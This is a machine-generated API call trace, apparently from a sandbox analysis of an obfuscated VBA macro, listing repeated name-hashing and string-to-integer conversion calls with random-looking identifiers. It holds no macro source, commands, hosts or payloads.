[0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GAUGQwX_") returned 0x1078e6 [0067.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GBwAUC_4") returned 0x100e0f [0067.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="W_wk1ACC") returned 0x10f2f1 [0067.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MD_oAAAB") returned 0x10c8b6 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kAAA11") returned 0x1036ee [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jUBAAAG") returned 0x101175 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cABUw4A") returned 0x108481 [0067.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VcAQ4_") returned 0x10aa89 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zA_XcU_w") returned 0x1025e0 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nwAACX") returned 0x1075ee [0067.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qBc_DAA") returned 0x10e535 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ODUAADA") returned 0x109b9b [0067.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oAZAQAw_") returned 0x10040b [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jxwDCcA") returned 0x1017b6 [0067.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vZkc4oA_") returned 0x10cea8 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.927] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0067.927] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0067.927] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mAoAQBAo") returned 0x101ae9 [0067.927] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HZDUAAA") returned 0x1098ca [0067.927] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0067.927] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0067.927] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Resume") returned 0x10728b [0067.927] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0067.927] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.927] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nwG1AkD") returned 0x10a784 [0067.927] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lBXAU4A") returned 0x10d50a [0067.928] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.928] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hXZBACU") returned 0x1049f1 [0067.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.928] VarI4FromStr (in: strIn="498992569", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.928] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LA1UQA") returned 0x10626c [0067.928] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iC_ABDUo") returned 0x107b63 [0067.928] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LxXAAkA") returned 0x10608f [0067.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.928] VarI4FromStr (in: strIn="492812093", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.928] VarI4FromStr (in: strIn="51922526", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.928] VarI4FromStr (in: strIn="900540128", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.928] VarI4FromStr (in: strIn="400395321", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.928] VarI4FromStr (in: strIn="742031566", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.928] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dADDAAA") returned 0x105186 [0067.928] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.928] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="z4AkwDAA") returned 0x103b62 [0067.928] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="hX_AAB", cchCount1=-1, lpString2="z4AkwDAA", cchCount2=-1) returned 1 [0067.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.928] VarI4FromStr (in: strIn="916626737", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.928] VarI4FromStr (in: strIn="696052306", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.928] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.928] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bxUAXD") returned 0x10fe08 [0067.928] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.928] VarI4FromStr (in: strIn="47818088", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.928] VarI4FromStr (in: strIn="878517125", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.928] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.928] VarI4FromStr (in: strIn="780041611", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.928] VarI4FromStr (in: strIn="269275729", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.928] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.928] VarI4FromStr (in: strIn="926438023", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.928] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tGUA_AQA") returned 0x10d3b1 [0067.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.929] VarI4FromStr (in: strIn="299079391", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vcAAAA") returned 0x1056bc [0067.929] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="FZ4xCCX", cchCount1=-1, lpString2="vcAAAA", cchCount2=-1) returned 1 [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pBowAUAG") returned 0x1057c5 [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GAAoZAD") returned 0x10574b [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PAAAAAZ") returned 0x103865 [0067.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.929] VarI4FromStr (in: strIn="660865253", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OUAGAo") returned 0x101a5a [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iCDQAUcG") returned 0x10c7f1 [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QDUQUk") returned 0x10410d [0067.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.929] VarI4FromStr (in: strIn="473437925", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.929] VarI4FromStr (in: strIn="623285144", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.929] VarI4FromStr (in: strIn="357374332", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.929] VarI4FromStr (in: strIn="788231369", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.929] VarI4FromStr (in: strIn="238306508", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mCDACU") returned 0x10dc0c [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AG_QBx") returned 0x1041cc [0067.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.929] VarI4FromStr (in: strIn="759736708", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.929] VarI4FromStr (in: strIn="882989927", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zUwAx4") returned 0x102e40 [0067.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.929] VarI4FromStr (in: strIn="737106185", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.929] VarI4FromStr (in: strIn="980496248", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.930] VarI4FromStr (in: strIn="310979464", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.930] VarI4FromStr (in: strIn="190430560", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.930] VarI4FromStr (in: strIn="180156471", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cGA44A") returned 0x10a808 [0067.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.930] VarI4FromStr (in: strIn="295680864", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cA1UwQoD") returned 0x100fda [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ToAcDUAX") returned 0x10bf30 [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CwUAAcc") returned 0x10463e [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ww4AAA") returned 0x10213b [0067.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.930] VarI4FromStr (in: strIn="890145926", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dQDZ1Ao") returned 0x1063f4 [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UQ1DBGxA") returned 0x109348 [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uD__DD") returned 0x109cf1 [0067.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.930] VarI4FromStr (in: strIn="654779495", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.930] VarI4FromStr (in: strIn="480016134", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.930] VarI4FromStr (in: strIn="778149976", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.930] VarI4FromStr (in: strIn="956229292", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.930] VarI4FromStr (in: strIn="729315434", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rQAGAQC") returned 0x10b7d2 [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.930] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ex4Zoo") returned 0x104b04 [0067.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.931] VarI4FromStr (in: strIn="407632565", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.931] VarI4FromStr (in: strIn="917021805", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JBCkkA1k") returned 0x104a20 [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.931] VarI4FromStr (in: strIn="652274775", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.931] VarI4FromStr (in: strIn="328076922", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.931] VarI4FromStr (in: strIn="112977607", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.931] VarI4FromStr (in: strIn="212802880", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.931] VarI4FromStr (in: strIn="211448894", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XAwxAX") returned 0x101255 [0067.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.931] VarI4FromStr (in: strIn="43622699", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OAoBZQDB") returned 0x10e26a [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QAA4AA") returned 0x107c0d [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uwABBBA") returned 0x10076a [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nxZGXw") returned 0x100a8f [0067.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.931] VarI4FromStr (in: strIn="422487185", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rZxGAA4A") returned 0x10f7a3 [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dADQAC") returned 0x1040ff [0067.931] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RcQZAA") returned 0x10dc71 [0067.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.931] VarI4FromStr (in: strIn="643351452", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.932] VarI4FromStr (in: strIn="31840830", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.932] VarI4FromStr (in: strIn="791368836", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.932] VarI4FromStr (in: strIn="252466736", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.932] VarI4FromStr (in: strIn="512846063", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBkAw_X") returned 0x10add7 [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="w44D1A") returned 0x10ce28 [0067.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.932] VarI4FromStr (in: strIn="695091991", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.932] VarI4FromStr (in: strIn="503050726", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DxDAADwk") returned 0x107188 [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.932] VarI4FromStr (in: strIn="45572360", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.932] VarI4FromStr (in: strIn="35678862", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.932] VarI4FromStr (in: strIn="961429272", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.932] VarI4FromStr (in: strIn="339926179", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.932] VarI4FromStr (in: strIn="728793775", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JoCwZZAA") returned 0x10e144 [0067.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.932] VarI4FromStr (in: strIn="294313883", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tA4BA1") returned 0x1000fb [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mADQ_DQG") returned 0x101c4a [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uQBBZkc_") returned 0x107c47 [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BUoX41") returned 0x101ba6 [0067.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.933] VarI4FromStr (in: strIn="423588061", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.933] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RAQAUAx") returned 0x104152 [0067.933] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vkXZQ_UQ") returned 0x1019ab [0067.933] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zDAAAC") returned 0x104364 [0067.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.933] VarI4FromStr (in: strIn="680263286", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.933] VarI4FromStr (in: strIn="338631706", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.933] VarI4FromStr (in: strIn="934653854", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.933] VarI4FromStr (in: strIn="176166553", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.933] VarI4FromStr (in: strIn="174033171", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.933] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XAxAkAX") returned 0x10785a [0067.933] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d 